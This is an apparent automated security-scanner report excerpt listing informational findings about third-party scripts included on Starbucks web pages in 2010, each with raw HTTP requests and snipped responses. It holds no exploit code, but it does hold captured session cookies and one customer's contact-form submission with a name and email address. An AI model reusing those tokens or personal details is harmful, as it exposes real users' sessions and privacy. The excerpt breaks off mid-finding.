X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:27 GMT
Connection: close
Content-Length: 91508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.66. http://www.starbucks.com/store-locator

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store-locator HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:07 GMT
Connection: close
Content-Length: 39643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<![endif]-->

   
   <script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2"></script>
...[SNIP]...

10.67. http://www.starbucks.com/whats-new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /whats-new HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:52 GMT
Connection: close
Content-Length: 43911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.68. http://www.starbucksstore.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.69. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14191
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:21 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.70. http://www.starbucksstore.com/StarbucksCard/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /StarbucksCard/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /StarbucksCard/default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19809
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:37 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.71. http://www.starbucksstore.com/coffee-machines/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee-machines/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21084
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:35:58 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.72. http://www.starbucksstore.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:40 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.73. http://www.starbucksstore.com/entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16333
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:31 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.74. http://www.starbucksstore.com/extras/newsletters.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /extras/newsletters.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16315
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:12 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.75. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/ga_faq_shipop.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42716
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:01 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.76. http://www.starbucksstore.com/guestassist/gareturns.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/gareturns.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15036
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:11 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.77. http://www.starbucksstore.com/guestassist/shcontus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20601
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:57 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.78. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaemailconfirm.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /guestassist/shgaemailconfirm.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shgaform.asp
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1312787331-1289934823813; ASPSESSIONIDACACCDBA=POGLDLCBAAAEGEBIMPBBLEID; s_cc=true; __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.2.10.1289934824; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shgaform.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_submit2.gif%2526ot%253DIMAGE
Content-Length: 628

txtFirstName=Hoyt&txtMidInitial=&txtLastName=LLC&txtEMailAddress=h02332%40gmail.com&cboSubTopics=5&txtareaMessage=Hello+and+Good+Day-%0D%0A%0D%0AHoyt+LLC+from+David%2C+Ma..+this+is+David..%0D%0A2+issu
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12588
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=HCCBELCBGFGJAEFDAFOHNILL; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:39:41 GMT

<!--S1--><!--S0-->
   

<!-- Common Function include file -->

<!-- EMail include file -->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HT
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.79. http://www.starbucksstore.com/guestassist/shgaform.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

POST /guestassist/shgaform.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; s_cc=true; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.1.10.1289934824; __qca=P0-1312787331-1289934823813; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shcontus.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_writeemail.gif%2526ot%253DIMAGE
Content-Length: 67

cboSubjects=1000&cboSubTopics=1006&EMail.x=83&EMail.y=9&EMail=email

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16848
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=JDPAELCBMFLNOOGBJGPPEOAB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:36:18 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.80. http://www.starbucksstore.com/mya/links.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/links.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15609
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:40 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.81. http://www.starbucksstore.com/mya/track.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/track.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18332
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:42 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.82. http://www.starbucksstore.com/products/shabotus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shabotus.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14434
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:33 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.83. http://www.starbucksstore.com/products/shourplg.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shourplg.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
